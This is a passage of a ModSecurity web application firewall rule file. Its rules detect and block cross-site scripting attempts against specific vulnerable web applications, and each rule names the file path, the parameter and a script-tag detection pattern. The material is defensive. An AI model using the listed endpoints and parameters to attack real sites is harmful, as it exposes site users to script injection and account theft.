"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009673,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS programsrating postcomments.php id XSS attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0907-exploits/programsrating-xss.txt'" SecRule ARGS_NAMES "(?i:id)" "chain" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains <script>" "chain" SecRule REQUEST_LINE "@contains </script>" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS programsrating postcomments.php id XSS attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004587) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- awards.php SecRule REQUEST_LINE "@contains /awards.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004587,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- awards.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469260/100/0/threaded'" SecRule REQUEST_LINE "@contains | 3C |" "chain" SecRule REQUEST_LINE "@contains SCRIPT" "chain" SecRule REQUEST_LINE "@contains | 3E |" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- awards.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004588) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- login.php SecRule REQUEST_LINE "@contains /login.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004588,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- login.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469260/100/0/threaded'" SecRule REQUEST_LINE "@contains | 3C |" "chain" SecRule REQUEST_LINE "@contains SCRIPT" "chain" SecRule REQUEST_LINE "@contains | 3E |" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- login.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004589) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- register.php SecRule REQUEST_LINE "@contains /register.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004589,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- register.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469260/100/0/threaded'" SecRule REQUEST_LINE "@contains | 3C |" "chain" SecRule REQUEST_LINE "@contains SCRIPT" "chain" SecRule REQUEST_LINE "@contains | 3E |" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- register.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004590) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- weapons.php SecRule REQUEST_LINE "@contains /weapons.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004590,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- weapons.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469260/100/0/threaded'" SecRule REQUEST_LINE "@contains | 3C |" "chain" SecRule REQUEST_LINE "@contains SCRIPT" "chain" SecRule REQUEST_LINE "@contains | 3E |" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- weapons.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004571) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RM EasyMail Plus XSS Attempt -- Login d SecRule REQUEST_LINE "@contains cp/ps/Main/login/Login" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004571,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS RM EasyMail Plus XSS Attempt -- Login d',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/25326'" SecRule &TX:'/XSS.*ARGS:d/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RM EasyMail Plus XSS Attempt -- Login d',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003872) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Redoable XSS Attempt -- searchloop.php s SecRule REQUEST_LINE "@contains /wp-content/themes/redoable/searchloop.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003872,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Redoable XSS Attempt -- searchloop.php s',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/468892/100/0/threaded'" SecRule &TX:'/XSS.*ARGS:s/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Redoable XSS Attempt -- searchloop.php s',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003873) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Redoable XSS Attempt -- header.php s SecRule REQUEST_LINE "@contains /wp-content/themes/redoable/header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003873,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Redoable XSS Attempt -- header.php s',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/468892/100/0/threaded'" SecRule &TX:'/XSS.*ARGS:s/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Redoable XSS Attempt -- header.php s',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003871) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ripe Website Manager XSS Attempt -- index.php ripeformpost SecRule REQUEST_LINE "@contains /contact/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003871,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Ripe Website Manager XSS Attempt -- index.php ripeformpost',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23597'" SecRule &TX:'/XSS.*ARGS:ripeformpost/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ripe Website Manager XSS Attempt -- index.php ripeformpost',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011731) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SchoolMation studentmain.php session Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /html/studentmain.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011731,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS SchoolMation studentmain.php session Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,40737'" SecRule &TX:'/XSS.*ARGS:session/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SchoolMation studentmain.php session Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003922) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Sendcard XSS Attempt -- sendcard.php form SecRule REQUEST_LINE "@contains /sendcard.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003922,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Sendcard XSS Attempt -- sendcard.php form',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/25085'" SecRule &TX:'/XSS.*ARGS:form/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Sendcard XSS Attempt -- sendcard.php form',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003881) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SonicBB XSS Attempt -- search.php part SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003881,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SonicBB XSS Attempt -- search.php part',tag:'web-application-attack',tag:'url,www.netvigilance.com/advisory0020'" SecRule &TX:'/XSS.*ARGS:part/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SonicBB XSS Attempt -- search.php part',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011065) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SurgeFTP surgeftpmgr.cgi classid Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /cgi/surgeftpmgr.cgi" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011065,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS SurgeFTP surgeftpmgr.cgi classid Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains cmd=class&" "chain" SecRule &TX:'/XSS.*ARGS:classid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SurgeFTP surgeftpmgr.cgi classid Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003902) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Tomcat XSS Attempt -- implicit-objects.jsp SecRule REQUEST_LINE "@contains /implicit-objects.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003902,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Tomcat XSS Attempt -- implicit-objects.jsp',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/1729'" SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Tomcat XSS Attempt -- implicit-objects.jsp',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004575) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Tomcat XSS Attempt -- hello.jsp test SecRule REQUEST_LINE "@contains /appdev/sample/web/hello.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004575,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Tomcat XSS Attempt -- hello.jsp test',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24058'" SecRule &TX:'/XSS.*ARGS:test/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Tomcat XSS Attempt -- hello.jsp test',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004558) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Track+ XSS Attempt -- reportItem.do projId SecRule REQUEST_LINE "@contains /reportItem.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004558,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Track+ XSS Attempt -- reportItem.do projId',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24060'" SecRule &TX:'/XSS.*ARGS:projId/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Track+ XSS Attempt -- reportItem.do projId',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003917) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TurnkeyWebTools SunShop Shopping Cart XSS Attempt -- index.php l SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003917,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TurnkeyWebTools SunShop Shopping Cart XSS Attempt -- index.php l',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23856'" SecRule &TX:'/XSS.*ARGS:l/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TurnkeyWebTools SunShop Shopping Cart XSS Attempt -- index.php l',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003888) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- browseCat.php catFile SecRule REQUEST_LINE "@contains /browseCat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003888,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- browseCat.php catFile',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3887'" SecRule &TX:'/XSS.*ARGS:catFile/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- browseCat.php catFile',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003889) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- browseSubCat.php catFile SecRule REQUEST_LINE "@contains /browseSubCat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003889,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- browseSubCat.php catFile',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3887'" SecRule &TX:'/XSS.*ARGS:catFile/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- browseSubCat.php catFile',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003890) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- openTutorial.php id SecRule REQUEST_LINE "@contains /openTutorial.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003890,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- openTutorial.php id',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3887'" SecRule &TX:'/XSS.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- openTutorial.php id',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003891) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- topFrame.php id SecRule REQUEST_LINE "@contains /topFrame.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003891,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- topFrame.php id',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3887'" SecRule &TX:'/XSS.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- topFrame.php id',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003892) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- editListing.php id SecRule REQUEST_LINE "@contains /admin/editListing.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003892,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- editListing.php id',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3887'" SecRule &TX:'/XSS.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- editListing.php id',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003893) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- search.php search SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003893,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- search.php search',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3887'" SecRule &TX:'/XSS.*ARGS:search/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- search.php search',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004573) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS VP-ASP Shopping Cart XSS Attempt -- shopcontent.asp type SecRule REQUEST_LINE "@contains /shopcontent.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004573,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS VP-ASP Shopping Cart XSS Attempt -- shopcontent.asp type',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/468834/100/0/threaded'" SecRule &TX:'/XSS.*ARGS:type/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS VP-ASP Shopping Cart XSS Attempt -- shopcontent.asp type',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010167) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp Queue XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/viewHeaders.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010167,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp Queue XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:Queue/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp Queue XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010168) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp FileName XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/viewHeaders.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010168,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp FileName XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:FileName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp FileName XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010169) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp IsolatedMessageID XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/viewHeaders.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010169,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp IsolatedMessageID XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:IsolatedMessageID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp IsolatedMessageID XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010170) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp ServerName XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/viewHeaders.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010170,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp ServerName XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:ServerName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security viewHeaders.asp ServerName XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010171) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp FileName XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/actions/msgAnalyse.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010171,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp FileName XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:FileName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp FileName XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010172) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp IsolatedMessageID XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/actions/msgAnalyse.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010172,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp IsolatedMessageID XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:IsolatedMessageID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp IsolatedMessageID XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010173) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp ServerName XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/actions/msgAnalyse.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010173,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp ServerName XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:ServerName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp ServerName XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010174) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp Dictionary XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/actions/msgAnalyse.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010174,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp Dictionary XSS Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36741/'" SecRule &TX:'/XSS.*ARGS:Dictionary/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp Dictionary XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010175) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp Scoring XSS Attempt SecRule REQUEST_LINE "@contains /web/msgList/viewmsg/actions/msgAnalyse.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010175,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WebSense Email security msgAnalyse.asp Scoring XSS 